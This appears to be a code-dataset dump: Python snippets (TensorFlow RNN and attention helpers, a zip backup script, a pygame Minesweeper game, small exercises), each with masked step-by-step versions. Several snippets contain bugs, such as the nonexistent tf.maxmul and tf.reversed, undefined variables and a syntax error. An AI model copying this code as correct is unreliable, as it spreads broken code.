non_res_depth:\n x = h + x\n hs[i] = h\n X[idx] = h\n return X, hs\n\n\n<mask token>\n\n\ndef _bahdanau_attn(h, e_out_W, e_out):\n w_q_attn = tf.get_variable('w_q_attn', [units, units], initializer=tf.\n random_normal_initializer(stddev=0.02))\n v = tf.get_variable('attn_v', [units], dtype=dtype)\n h = tf.maxmul(h, w_q_attn)\n return tf.reduce_sum(v * tf.tanh(e_out_W + h), [2])\n\n\ndef _simple_norm(inp, axis=1):\n return inp / tf.expand_dims(tf.reduce_sum(inp, axis), 1)\n\n\ndef _temp_attn(h, e_out_W, e_out, score_sum, time):\n score = tf.squeeze(tf.matmul(tf.expand_dims(h, 1), e_out_W, transpose_b\n =True), [1])\n score = tf.cond(time > 0, lambda : tf.exp(score) / (score_sum + 1e-12),\n lambda : tf.exp(score))\n a = _simple_norm(score)\n ctx = tf.squeeze(tf.matmul(tf.expand_dims(a, 1), e_out), [1])\n return ctx, score_sum + score\n\n\ndef _dec_attn(h, d_hsW, d_hs):\n score = tf.squeeze(tf.matmul(tf.expand_dims(h, 1), d_hsW, transpose_b=\n True), [1])\n a = tf.nn.softmax(score)\n ctx = tf.squeeze(tf.matmul(tf.expand_dims(a, 1), d_hs), [1])\n return ctx\n",
"step-5": "import tensorflow as tf\nfrom rnn_cells import gru_cell, lstm_cell\nfrom tensorflow.python.ops import rnn\n\ndef shape_list(x):\n ps = x.get_shape().as_list()\n ts = tf.shape(x)\n return [ts[i] if ps[i] is None else ps[i] for i in range(len(ps))]\n\ndef bi_dir_lstm(X, c_fw, h_fw, c_bw, h_bw, units, scope='bi_dir_lstm'):\n with tf.variable_scope(scope) as sc:\n # forward pass\n hs_fw = []\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n h_fw, c_fw = lstm_cell(x, c_fw, h_fw, 'fw_lstm_cell')\n hs_fw.append(h_fw)\n # backward pass\n hs_bw = []\n for idx, x in enumerate(tf.reversed(X)):\n if idx > 0:\n sc.reuse_variables()\n h_bw, c_bw = lstm_cell(x, c_bw, h_bw, 'bw_lstm_cell')\n hs_bw.append(h_bw)\n # stack outputs\n hs_fw = tf.stack(hs_fw)\n hs_bw = tf.reversed(tf.stack(hs_bw), 0)\n # concat outputs and states \n X = tf.concat((hs_fw, hs_bw), 2)\n c = tf.concat((c_fw, c_bw), 1)\n h = tf.concat((h_fw, h_bw), 1)\n return X, c, h\n\ndef bi_dir_gru(X, h_fw, h_bw, units, scope='bi_dir_gru'):\n with tf.variable_scope(scope) as sc:\n # forward pass\n hs_fw = []\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n h_fw = gru_cell(x, h_fw, 'fw_gru_cell')\n hs_fw.append(h_fw)\n # backward pass\n hs_bw = []\n for idx, x in enumerate(reversed(X)):\n if idx > 0:\n sc.reuse_variables()\n h_bw = gru_cell(x, h_bw, 'bw_gru_cell')\n hs_bw.append(h_bw)\n # stack outputs\n hs_fw = tf.stack(hs_fw)\n hs_bw = tf.reversed(tf.stack(hs_bw), 0)\n # concat outputs and states \n X = tf.concat((hs_fw, hs_bw), 2)\n h = tf.concat((h_fw, h_bw), 1)\n return X, h\n\ndef stacked_lstm(X, cs, hs, units, depth, non_res_depth, scope='stacked_lstm'):\n with tf.variable_scope(scope) as sc:\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n # handle the stack of lstm_cells\n for i in range(depth):\n h, c = lstm_cell(x, cs[i], hs[i], units, scope=\"cell_%d\" % i)\n # add residual connections after specified depth\n if i >= non_res_depth:\n x = h + 
x\n cs[i] = c\n hs[i] = h\n X[idx] = h\n return X, cs, hs\n\ndef stacked_gru(X, hs, units, depth, non_res_depth, scope='stacked_gru'):\n with tf.variable_scope(scope) as sc:\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n # hande the stack of lstm_cells\n for i in range(depth):\n h, c = gru_cell(x, hs[i], units, scope=\"cell_%d\" % i)\n # add residual connections after specified depth\n if i >= non_res_depth:\n x = h + x\n hs[i] = h\n X[idx] = h\n return X, hs\n\ndef _luong_attn(h, e_out_W, e_out):\n score = tf.squeeze(tf.matmul(tf.expand_dims(h, 1), e_out_W, transpose_b=True), [1])\n a = tf.nn.softmax(score)\n ctx = tf.squeeze(tf.matmul(tf.expand_dims(a, 1), e_out), [1])\n return ctx\n\ndef _bahdanau_attn(h, e_out_W, e_out):\n w_q_attn = tf.get_variable(\"w_q_attn\", [units, units], initializer=tf.random_normal_initializer(stddev=0.02))\n v = tf.get_variable(\"attn_v\", [units], dtype=dtype)\n h = tf.maxmul(h, w_q_attn)\n return tf.reduce_sum(v * tf.tanh(e_out_W + h), [2])\n\ndef _simple_norm(inp, axis=1):\n return inp / tf.expand_dims(tf.reduce_sum(inp, axis), 1)\n\ndef _temp_attn(h, e_out_W, e_out, score_sum, time):\n score = tf.squeeze(tf.matmul(tf.expand_dims(h, 1), e_out_W, transpose_b=True), [1])\n score = tf.cond(time > 0, lambda: tf.exp(score)/(score_sum+1e-12), lambda: tf.exp(score))\n a = _simple_norm(score)\n ctx = tf.squeeze(tf.matmul(tf.expand_dims(a, 1), e_out), [1])\n return ctx, score_sum + score\n\ndef _dec_attn(h, d_hsW, d_hs):\n score = tf.squeeze(tf.matmul(tf.expand_dims(h, 1), d_hsW, transpose_b=True), [1])\n a = tf.nn.softmax(score)\n ctx = tf.squeeze(tf.matmul(tf.expand_dims(a, 1), d_hs), [1])\n return ctx",
"step-ids": [
6,
7,
8,
9,
12
]
}
|
[
6,
7,
8,
9,
12
] |
name_list =[ ]
a = 1
for a in range(1,33):
name = input("请输入要加入列表的名字:")
name_list.append("name")
print(name)
print(list_ name)
|
normal
|
{
"blob_id": "3f7dddcfde9d33f30f00156fc41700da2692afc3",
"index": 2006,
"step-1": "name_list =[ ]\na = 1\nfor a in range(1,33):\n name = input(\"请输入要加入列表的名字:\")\n name_list.append(\"name\")\n print(name)\nprint(list_ name)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
myfavoritenumber = 5
print(myfavoritenumber)
x = 5
x = x + 1
print(x)
x, y, z = 1, 2, 3
print(x, y, z)
|
normal
|
{
"blob_id": "e6c7b15e5b42cfe6c5dec2eaf397b67afd716ebd",
"index": 3858,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(myfavoritenumber)\n<mask token>\nprint(x)\n<mask token>\nprint(x, y, z)\n",
"step-3": "myfavoritenumber = 5\nprint(myfavoritenumber)\nx = 5\nx = x + 1\nprint(x)\nx, y, z = 1, 2, 3\nprint(x, y, z)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# Complete the hurdleRace function below.
def hurdleRace(k, height):
if k < max(height):
return max(height) - k
return 0
print(hurdleRace(2, [2,5,4,5,2]))
|
normal
|
{
"blob_id": "c139cbc3e693d75ad196e10257ff3028aa835709",
"index": 428,
"step-1": "<mask token>\n",
"step-2": "def hurdleRace(k, height):\n if k < max(height):\n return max(height) - k\n return 0\n\n\n<mask token>\n",
"step-3": "def hurdleRace(k, height):\n if k < max(height):\n return max(height) - k\n return 0\n\n\nprint(hurdleRace(2, [2, 5, 4, 5, 2]))\n",
"step-4": "# Complete the hurdleRace function below.\ndef hurdleRace(k, height):\n if k < max(height):\n return max(height) - k\n return 0\n\nprint(hurdleRace(2, [2,5,4,5,2]))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# -*- coding: utf-8 -*-
"""
Created on Mon Aug 13 14:10:15 2018
9.5 项目:将一个文件夹备份到一个 ZIP 文件
@author: NEVERGUVEIP
"""
#! python3
import zipfile,os
def backupToZip(folder):
#backup the entire contents of 'folder' into a ZIP file
folder = os.path.abspath(folder)
os.chdir(folder)
#figure out the filename this code should use based on
#what files already exist.
number = 1
#从1循环检查文件名存不存在,_1.zip,_2.zip,,防止备份以前的备份文件
while True:
zipFilename = os.path.basename(folder) +'_'+str(number)+'.zip'
if not os.path.exists(zipFilename):
break
number = number +1
#creat the zip file
print('creating %s...'%(zipFilename))
backupZip = zipfile.ZipFile(zipFilename,'w')
#TODO: walk the entire folder tree and compress the files in each folder.
for foldername,subfolders,filenames in os.walk(folder):#
print('adding files in %s...'%(foldername))
#add the current folder to the zip file.
backupZip.write(foldername)
#add all the files in this folder to the ZIP file.
for filename in filenames:
newBase = os.path.basename(folder)+'_'
if filename.startswith(newBase) and filename.endswith('.zip'):
continue# don't backup the backup ZIP files
backupZip.write(os.path.join(foldername,filename))
backupZip.close()
print('......Done......')
#backupToZip(r'C:\Users\NEVERGUVEIP\Documents\GitHub\python_test')
backupToZip('.')
|
normal
|
{
"blob_id": "7af19f69e6c419649a5999f594118ad13833a537",
"index": 7398,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef backupToZip(folder):\n folder = os.path.abspath(folder)\n os.chdir(folder)\n number = 1\n while True:\n zipFilename = os.path.basename(folder) + '_' + str(number) + '.zip'\n if not os.path.exists(zipFilename):\n break\n number = number + 1\n print('creating %s...' % zipFilename)\n backupZip = zipfile.ZipFile(zipFilename, 'w')\n for foldername, subfolders, filenames in os.walk(folder):\n print('adding files in %s...' % foldername)\n backupZip.write(foldername)\n for filename in filenames:\n newBase = os.path.basename(folder) + '_'\n if filename.startswith(newBase) and filename.endswith('.zip'):\n continue\n backupZip.write(os.path.join(foldername, filename))\n backupZip.close()\n print('......Done......')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef backupToZip(folder):\n folder = os.path.abspath(folder)\n os.chdir(folder)\n number = 1\n while True:\n zipFilename = os.path.basename(folder) + '_' + str(number) + '.zip'\n if not os.path.exists(zipFilename):\n break\n number = number + 1\n print('creating %s...' % zipFilename)\n backupZip = zipfile.ZipFile(zipFilename, 'w')\n for foldername, subfolders, filenames in os.walk(folder):\n print('adding files in %s...' % foldername)\n backupZip.write(foldername)\n for filename in filenames:\n newBase = os.path.basename(folder) + '_'\n if filename.startswith(newBase) and filename.endswith('.zip'):\n continue\n backupZip.write(os.path.join(foldername, filename))\n backupZip.close()\n print('......Done......')\n\n\nbackupToZip('.')\n",
"step-4": "<mask token>\nimport zipfile, os\n\n\ndef backupToZip(folder):\n folder = os.path.abspath(folder)\n os.chdir(folder)\n number = 1\n while True:\n zipFilename = os.path.basename(folder) + '_' + str(number) + '.zip'\n if not os.path.exists(zipFilename):\n break\n number = number + 1\n print('creating %s...' % zipFilename)\n backupZip = zipfile.ZipFile(zipFilename, 'w')\n for foldername, subfolders, filenames in os.walk(folder):\n print('adding files in %s...' % foldername)\n backupZip.write(foldername)\n for filename in filenames:\n newBase = os.path.basename(folder) + '_'\n if filename.startswith(newBase) and filename.endswith('.zip'):\n continue\n backupZip.write(os.path.join(foldername, filename))\n backupZip.close()\n print('......Done......')\n\n\nbackupToZip('.')\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 13 14:10:15 2018\n9.5 项目:将一个文件夹备份到一个 ZIP 文件 \n\n@author: NEVERGUVEIP\n\"\"\"\n#! python3\n\nimport zipfile,os\n\ndef backupToZip(folder):\n #backup the entire contents of 'folder' into a ZIP file\n \n folder = os.path.abspath(folder)\n os.chdir(folder)\n #figure out the filename this code should use based on\n #what files already exist. \n number = 1 \n #从1循环检查文件名存不存在,_1.zip,_2.zip,,防止备份以前的备份文件\n while True:\n zipFilename = os.path.basename(folder) +'_'+str(number)+'.zip'\n if not os.path.exists(zipFilename):\n break\n number = number +1\n \n \n #creat the zip file\n print('creating %s...'%(zipFilename))\n backupZip = zipfile.ZipFile(zipFilename,'w')\n \n #TODO: walk the entire folder tree and compress the files in each folder. \n\n for foldername,subfolders,filenames in os.walk(folder):#\n \n print('adding files in %s...'%(foldername)) \n #add the current folder to the zip file.\n backupZip.write(foldername)\n #add all the files in this folder to the ZIP file.\n for filename in filenames:\n newBase = os.path.basename(folder)+'_'\n if filename.startswith(newBase) and filename.endswith('.zip'):\n continue# don't backup the backup ZIP files\n backupZip.write(os.path.join(foldername,filename))\n \n backupZip.close() \n print('......Done......')\n\n#backupToZip(r'C:\\Users\\NEVERGUVEIP\\Documents\\GitHub\\python_test')\nbackupToZip('.')\n \n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# ----------------------------------------------------------------------------
# Copyright (c) 2016-2018, q2-chemistree development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import unittest
from q2_chemistree.plugin_setup import plugin as chemistree_plugin
class PluginSetupTests(unittest.TestCase):
def test_plugin_setup(self):
self.assertEqual(chemistree_plugin.name, 'chemistree')
|
normal
|
{
"blob_id": "4296dc5b79fd1d2c872eb1115beab52a0f067423",
"index": 4816,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass PluginSetupTests(unittest.TestCase):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass PluginSetupTests(unittest.TestCase):\n\n def test_plugin_setup(self):\n self.assertEqual(chemistree_plugin.name, 'chemistree')\n",
"step-4": "import unittest\nfrom q2_chemistree.plugin_setup import plugin as chemistree_plugin\n\n\nclass PluginSetupTests(unittest.TestCase):\n\n def test_plugin_setup(self):\n self.assertEqual(chemistree_plugin.name, 'chemistree')\n",
"step-5": "# ----------------------------------------------------------------------------\n# Copyright (c) 2016-2018, q2-chemistree development team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file LICENSE, distributed with this software.\n# ----------------------------------------------------------------------------\n\nimport unittest\n\nfrom q2_chemistree.plugin_setup import plugin as chemistree_plugin\n\n\nclass PluginSetupTests(unittest.TestCase):\n\n def test_plugin_setup(self):\n self.assertEqual(chemistree_plugin.name, 'chemistree')\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import sys
import random
import pygame
import pygame.locals
import time
# TODO high scores, difficulties
# Absolutes (in pixels where not otherwise stated)
CELL_SIDE_LENGTH = 40 # Side length of each cell
CELL_MARGIN = 2 # Gap between cells
GRID_HEIGHT = 10 # How many cells are in the grid
GRID_WIDTH = 10
X_BOARD_MARGIN = 50 # Gap between grid and sides of board
Y_BOARD_MARGIN = 75
MENU_MARGIN = 100 # Amount of space on the right dedicated to the menu
DIFFICULTY = 0.1 # Ratio of bombs (10% by default)
FPS = 30 # frames per second (window refresh speed)
# Relatives (so board size can easily be changed)
NUM_MINES = 1 + int(GRID_WIDTH * GRID_HEIGHT * DIFFICULTY) # Default about 10% of the board is mines
WINDOW_HEIGHT = (CELL_SIDE_LENGTH * GRID_HEIGHT) + (CELL_MARGIN * GRID_HEIGHT) + (Y_BOARD_MARGIN * 2)
WINDOW_WIDTH = (CELL_SIDE_LENGTH * GRID_WIDTH) + (CELL_MARGIN * GRID_WIDTH) + (X_BOARD_MARGIN * 2) + MENU_MARGIN
# R G B (not all used, but kept so theme can easily be changed)
RED = (255, 0, 0)
YELLOW = (255, 255, 0)
GREEN = (0, 255, 0)
MIDGREEN = (40, 190, 40)
CYAN = (0, 255, 255)
BLUE = (0, 0, 255)
DARKBLUE = (20, 20, 60)
MAGENTA = (255, 0, 255)
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
GRAY = (200, 200, 200)
BG_COLOR = DARKBLUE # Background color
CELL_COLOR = GRAY # Universal cover color
HIGHLIGHT_COLOR = CYAN # Cell the cursor is currently hovering over
FLAG_COLOR = MIDGREEN
# Symbols
FLAG = 'flag'
MINE = 'mine'
CLEAR = 'clear'
class Game:
def __init__(self):
pygame.init()
global CLOCK, SURFACE
CLOCK = pygame.time.Clock()
SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))
self.mouse_x = 0 # Stores x-coordinate of mouse event
self.mouse_y = 0 # Stores y-coordinate of mouse event
pygame.display.set_caption('Minesweeper by Alyssa Moore 2017')
self.board = self.get_board()
self.revealed_cells = self.generate_data(False)
self.flags = self.generate_data(False)
self.questionmarks = self.generate_data(False)
self.game_over = False
self.timer = Stopwatch()
SURFACE.fill(BG_COLOR)
def main(self):
while True:
left_click = False
right_click = False
SURFACE.fill(BG_COLOR)
self.draw_board(self.board, self.revealed_cells, self.flags, self.questionmarks)
self.create_menu()
font = pygame.font.SysFont("times new roman", 25)
# Timer (will be used to implement high scores)
self.timer.start()
t1 = self.timer.get_seconds()
label = font.render(str(t1), 1, MAGENTA)
SURFACE.blit(label, (50, 50))
# Mouse event handling
for event in pygame.event.get():
if event.type == pygame.locals.QUIT:
pygame.quit()
sys.exit() # Even if the window closes, we still need to manually stop the processes
elif event.type == pygame.locals.MOUSEMOTION:
self.mouse_x, self.mouse_y = event.pos # For hovering info
elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 1: # Left click
self.mouse_x, self.mouse_y = event.pos
print(self.mouse_x, self.mouse_y)
left_click = True
elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 3: # Right click
self.mouse_x, self.mouse_y = event.pos
right_click = True
# If user decided to start over, reinitialize game
if self.game_over and right_click:
self.board = self.get_board()
self.revealed_cells = self.generate_data(False)
self.flags = self.generate_data(False)
self.questionmarks = self.generate_data(False)
self.game_over = False
self.timer = Stopwatch()
right_click = False
# TODO tweak spacing on text
if self.game_over:
self.timer.pause()
score = self.timer.get_seconds()
a_x = X_BOARD_MARGIN + ((GRID_WIDTH / 4) * CELL_SIDE_LENGTH)
b_y = Y_BOARD_MARGIN + (Y_BOARD_MARGIN / 4) + (GRID_HEIGHT * CELL_SIDE_LENGTH) + (GRID_HEIGHT * CELL_MARGIN)
font = pygame.font.SysFont("times new roman", 25)
if win:
label = font.render('Congratulations, you won!', 1, GREEN)
SURFACE.blit(label, (a_x - 75, b_y))
label = font.render('Score: ' + str(score), 1, GREEN)
SURFACE.blit(label, (a_x + 200, b_y))
else:
label = font.render('GAME OVER', 1, RED)
SURFACE.blit(label, (a_x + 10, b_y))
label = font.render('Press RIGHT mouse button', 1, YELLOW)
SURFACE.blit(label, (a_x - 50, b_y + 25))
cell_x, cell_y = self.get_cell_at_pixel(self.mouse_x, self.mouse_y)
if cell_x is not None and cell_y is not None: # If mouse is hovering over a cell during mouse event
# Highlight cell
if not self.revealed_cells[cell_x][cell_y] and not self.game_over:
self.highlight_cell(cell_x, cell_y)
# Digging somewhere
if not self.revealed_cells[cell_x][cell_y] and left_click and not self.game_over:
# So you can't accidentally click a flagged/question mark space
if not self.flags[cell_x][cell_y] and not self.questionmarks[cell_x][cell_y]:
self.flags[cell_x][cell_y] = False
if self.board[cell_x][cell_y][0] == MINE: # If you dig a mine, reveal all cells & game over
self.revealed_cells = self.generate_data(True)
self.game_over = True
elif self.board[cell_x][cell_y][0] == CLEAR: # If you dig a clear cell, reveal that cell
self.reveal_cells(cell_x, cell_y, self.board, self.revealed_cells, self.flags, self.questionmarks)
else:
self.revealed_cells[cell_x][cell_y] = True # Set the cell as revealed
# Redraw board after mouse event
self.draw_board(self.board, self.revealed_cells, self.flags, self.questionmarks)
# Placing a flag- if flag already there, change flag to question mark.
# If question mark already there, turn to nothing. If nothing there, turn on flag
if not self.revealed_cells[cell_x][cell_y] and right_click and not self.game_over:
if self.flags[cell_x][cell_y]:
self.flags[cell_x][cell_y] = False
self.questionmarks[cell_x][cell_y] = True
elif self.questionmarks[cell_x][cell_y]:
self.questionmarks[cell_x][cell_y] = False
self.flags[cell_x][cell_y] = False
else:
self.flags[cell_x][cell_y] = True
self.questionmarks[cell_x][cell_y] = False
# Flag is drawn in this method call
self.draw_board(self.board, self.revealed_cells, self.flags, self.questionmarks)
# This block decides whether or not the player has won yet after a mouse event
win = True
for x in range(GRID_WIDTH): # If a cell is a mine and not flagged, or if a cell is clear
for y in range(GRID_HEIGHT): # but not revealed, then the game is not yet over
if (self.board[x][y][0] == MINE and not self.flags[x][y]) or (
self.board[x][y][0] != MINE and not self.revealed_cells[x][y]):
win = False
if win:
self.game_over = True
# Redraw the screen and wait for clock tick
pygame.display.update()
CLOCK.tick(FPS)
@staticmethod
def get_board():
icons = []
mines = 0
# Bottom of board is made of only mines and clear cells, which is then selectively covered for gameplay
# Making randomized array
for x in range(GRID_WIDTH):
for y in range(GRID_HEIGHT):
if mines < NUM_MINES:
icons.append((MINE, RED))
mines += 1
else:
icons.append((CLEAR, WHITE))
random.shuffle(icons)
# Create static under-board
board = []
for x in range(GRID_WIDTH):
column = []
for y in range(GRID_HEIGHT):
column.append(icons[0])
del icons[0] # so the next icon[0] is the one after this
board.append(column)
# This block determines how many mines are around each cell, and adds the number to the board's array
for x in range(GRID_WIDTH):
for y in range(GRID_HEIGHT):
mines = 0
if x > 0:
if y > 0: # If not on the left edge AND not on top edge
if board[x - 1][y - 1][0] == MINE:
mines += 1
if board[x - 1][y][0] == MINE:
mines += 1
if y < GRID_HEIGHT - 1:
if board[x - 1][y + 1][0] == MINE:
mines += 1
if x < GRID_WIDTH - 1:
if y > 0: # If not on right edge AND not on top edge
if board[x + 1][y - 1][0] == MINE:
mines += 1
if board[x + 1][y][0] == MINE:
mines += 1
if y < GRID_HEIGHT - 1:
if board[x + 1][y + 1][0] == MINE:
mines += 1
if y > 0: # If not on right or left edge AND not on top edge
if board[x][y - 1][0] == MINE:
mines += 1
if y < GRID_HEIGHT - 1: # If not on riht or left edge AND on bottom edge
if board[x][y + 1][0] == MINE:
mines += 1
# If the cell is clear and there are mines around it, add the number of mines to board array
if board[x][y][0] != MINE:
if mines in range(1, 9):
board[x][y] = (str(mines), WHITE)
return board
# Used to show full board on game over & reset board on game start
@staticmethod
def generate_data(val):
clear = []
for i in range(GRID_WIDTH):
clear.append([val] * GRID_HEIGHT)
return clear
# Convert row, column coordinates into x, y pixel coordinates (for drawing shapes)
@staticmethod
def get_top_left_coordinates(row, column):
left = row * (CELL_SIDE_LENGTH + CELL_MARGIN) + X_BOARD_MARGIN
top = column * (CELL_SIDE_LENGTH + CELL_MARGIN) + Y_BOARD_MARGIN
return left, top
# Convert x, y pixel coordinates to row, column coordinates (for mouse hovering)
def get_cell_at_pixel(self, x, y):
for cell_x in range(GRID_WIDTH):
for cell_y in range(GRID_HEIGHT):
left, top = self.get_top_left_coordinates(cell_x, cell_y)
cell_rect = pygame.Rect(left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH)
if cell_rect.collidepoint(x, y): # If currently hovering over a cell
return cell_x, cell_y
return None, None # If not currently hovering over a cell
# Redraws board after mouse event
def draw_board(self, board, revealed, flags, questionmarks):
for cell_x in range(GRID_WIDTH):
for cell_y in range(GRID_HEIGHT):
left, top = self.get_top_left_coordinates(cell_x, cell_y)
# Symbols not added on board creation must be drawn here: "unrevealed" boxes, flags, and question marks
if not revealed[cell_x][cell_y]:
# Draw a gray box over unrevealed cell, so value isn't affected but user can't see the value
pygame.draw.rect(SURFACE, CELL_COLOR, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))
if flags[cell_x][cell_y]:
half = int(CELL_SIDE_LENGTH * 0.5) # Relative point halfway through cell
# top point, bottom left point, bottom right point
pygame.draw.polygon(SURFACE, FLAG_COLOR, [(half + left, top),
(left, top + CELL_SIDE_LENGTH - CELL_MARGIN/2),
(left + CELL_SIDE_LENGTH - CELL_MARGIN/2, top +
CELL_SIDE_LENGTH - CELL_MARGIN/2)])
elif questionmarks[cell_x][cell_y]:
quarter = int(CELL_SIDE_LENGTH * 0.25)
pygame.draw.rect(SURFACE, GRAY, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))
fontsize = int(CELL_SIDE_LENGTH)
font = pygame.font.SysFont("times new roman", fontsize)
label = font.render("?", 1, BLACK)
SURFACE.blit(label, (left + quarter, top))
else: # Draw revealed cells
shape, color = self.get_shape_and_color(board, cell_x, cell_y)
self.draw_icon(shape, color, cell_x, cell_y)
# Draws icon passed to it in the stated cell
def draw_icon(self, shape, color, cell_x, cell_y):
# Relative point of quarter-way through cell
quarter = int(CELL_SIDE_LENGTH * 0.25)
left, top = self.get_top_left_coordinates(cell_x, cell_y) # Drawing of all images starts at top left corner
# Draw the shapes
if shape == CLEAR:
pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))
elif shape == MINE:
pygame.draw.ellipse(SURFACE, color, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))
# Flag shape & question mark in draw_board because they are activated via mouse event
else: # Clear with num
pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))
fontsize = int(CELL_SIDE_LENGTH)
font = pygame.font.SysFont("times new roman", fontsize)
label = font.render(shape, 1, BLACK) # a cell with number corresponds to shapes "1", "2", etc.
SURFACE.blit(label, (left + quarter, top))
# Returns the shape and color of icon to be created in draw_icon method
@staticmethod
def get_shape_and_color(board, cell_x, cell_y):
# shape value for cell x, y is stored in board[x][y][0], color value in board[x][y][1]
return board[cell_x][cell_y][0], board[cell_x][cell_y][1]
# Draws a box around the cell the mouse is hovering over, 'highlighting' it
def highlight_cell(self, cell_x, cell_y):
left, top = self.get_top_left_coordinates(cell_x, cell_y)
# Changes with cell size, but line width is hard-set at 2px (last argument)
pygame.draw.rect(SURFACE, HIGHLIGHT_COLOR, (left - (CELL_MARGIN / 2), top - (CELL_MARGIN / 2),
CELL_SIDE_LENGTH + CELL_MARGIN, CELL_SIDE_LENGTH + CELL_MARGIN), 2)
# Reveals clear cells next to clear cell the user clicked (and clear cells next to those cells, etc.)
def reveal_cells(self, x, y, board, revealed, flags, questionmarks):
if revealed[x][y]: # If the cell is already revealed, do nothing
return
if flags[x][y]: # If the cell already has a flag on it, do nothing
return
revealed[x][y] = True
if board[x][y][0] != CLEAR:
return
if x > 0:
if y > 0:
self.reveal_cells(x - 1, y - 1, board, revealed, flags, questionmarks)
self.reveal_cells(x - 1, y, board, revealed, flags, questionmarks)
if y < GRID_HEIGHT - 1:
self.reveal_cells(x - 1, y + 1, board, revealed, flags, questionmarks)
if x < GRID_WIDTH - 1:
if y > 0:
self.reveal_cells(x + 1, y - 1, board, revealed, flags, questionmarks)
self.reveal_cells(x + 1, y, board, revealed, flags, questionmarks)
if y < GRID_HEIGHT - 1:
self.reveal_cells(x + 1, y + 1, board, revealed, flags, questionmarks)
if y > 0:
self.reveal_cells(x, y - 1, board, revealed, flags, questionmarks)
if y < GRID_HEIGHT - 1:
self.reveal_cells(x, y + 1, board, revealed, flags, questionmarks)
@staticmethod
def create_menu():
font = pygame.font.SysFont("times new roman", 20)
label = font.render(" High scores", 1, BLACK)
pygame.draw.rect(SURFACE, GRAY, (500, 125, 105, 50)) # view high scores
SURFACE.blit(label, (500, 135))
class Stopwatch:
    """Accumulating wall-clock timer that can be paused and resumed."""

    def __init__(self):
        self.seconds = 0         # time banked across completed runs
        self.running = False     # True while the watch is ticking
        self.latest_time = None  # time.time() of the most recent start()

    def start(self):
        """Begin (or resume) timing; no-op if already running."""
        if self.running:
            return
        self.running = True
        self.latest_time = time.time()

    def get_seconds(self):
        """Return total elapsed whole seconds, including the current run."""
        elapsed = self.seconds
        if self.running:
            elapsed += time.time() - self.latest_time
        return int(elapsed)

    def pause(self):
        """Stop timing and bank the current run; no-op if not running."""
        if not self.running:
            return
        self.running = False
        self.seconds += time.time() - self.latest_time
if __name__ == "__main__":
    # Launch the game only when this file is run as a script, so importing
    # the module (e.g. for testing) no longer starts the pygame event loop.
    g = Game()
    g.main()
|
normal
|
{
"blob_id": "030bc0c7bdbbb09f722ffe4c82866726062f5317",
"index": 1962,
"step-1": "<mask token>\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n global CLOCK, SURFACE\n CLOCK = pygame.time.Clock()\n SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n self.mouse_x = 0\n self.mouse_y = 0\n pygame.display.set_caption('Minesweeper by Alyssa Moore 2017')\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n SURFACE.fill(BG_COLOR)\n <mask token>\n <mask token>\n\n @staticmethod\n def generate_data(val):\n clear = []\n for i in range(GRID_WIDTH):\n clear.append([val] * GRID_HEIGHT)\n return clear\n <mask token>\n <mask token>\n\n def draw_board(self, board, revealed, flags, questionmarks):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if not revealed[cell_x][cell_y]:\n pygame.draw.rect(SURFACE, CELL_COLOR, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n if flags[cell_x][cell_y]:\n half = int(CELL_SIDE_LENGTH * 0.5)\n pygame.draw.polygon(SURFACE, FLAG_COLOR, [(half +\n left, top), (left, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2), (left + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2)])\n elif questionmarks[cell_x][cell_y]:\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n pygame.draw.rect(SURFACE, GRAY, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render('?', 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n else:\n shape, color = self.get_shape_and_color(board, cell_x,\n cell_y)\n self.draw_icon(shape, color, cell_x, cell_y)\n <mask token>\n\n @staticmethod\n def get_shape_and_color(board, cell_x, cell_y):\n return 